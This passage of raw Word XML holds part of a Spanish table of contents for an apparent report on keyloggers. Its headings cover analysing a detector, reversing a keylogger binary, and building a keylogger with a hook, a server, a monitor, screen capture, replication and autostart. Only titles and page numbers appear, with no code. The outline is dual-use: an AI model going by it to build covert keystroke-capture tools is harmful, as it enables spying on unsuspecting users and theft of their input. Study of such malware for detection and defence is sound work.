          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810077 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>5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78" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>11.2.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Análisis de KL-Detector</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810078 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>54</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079" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>12.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Reversing de un Keylogger</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810079 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>56</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0" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>12.1.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Análisis preliminar del binario</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810080 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>56</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1" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>12.2.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Análisis estático</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810081 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>63</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2" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>12.3.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Análisis dinámico</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810082 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>74</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083" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>13.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Desarrollo de un Keylogger</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810083 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>88</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4" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>13.1.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Lenguaje elegido para el desarrollo.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810084 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>88</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5" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>13.2.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>El Keylogger más corto</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810085 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>89</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6" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>13.3.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Características del Keylogger</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810086 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>91</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7" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>13.4.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Módulos necesarios</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810087 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>9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088" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>13.5.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Partes importantes del desarrollo</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810088 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>92</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89" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>13.5.1.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Notas previas sobre comentarios y mensajes</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810089 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>92</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0" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>13.5.2.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Algunos conceptos clave de la aplicación</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810090 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>92</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1" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>13.5.3.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Parámetros de la aplicación</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810091 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>93</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2" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>13.5.4.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Replicación y autoarranque</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810092 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>95</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3" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>13.5.5.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>El Hook</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810093 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>96</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4" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>13.5.6.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>El Servidor del keylogger</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810094 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>96</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5" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>13.5.7.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>El Monitor del keylogger</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810095 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>97</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6" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>13.5.8.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Captura de pantalla</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810096 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>98</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E24312" w:rsidRDefault="00E24312">
      <w:pPr>
        <w:pStyle w:val="TDC3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1320"/>
          <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc19810097" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>13.5.9.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Configuración de servicios</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
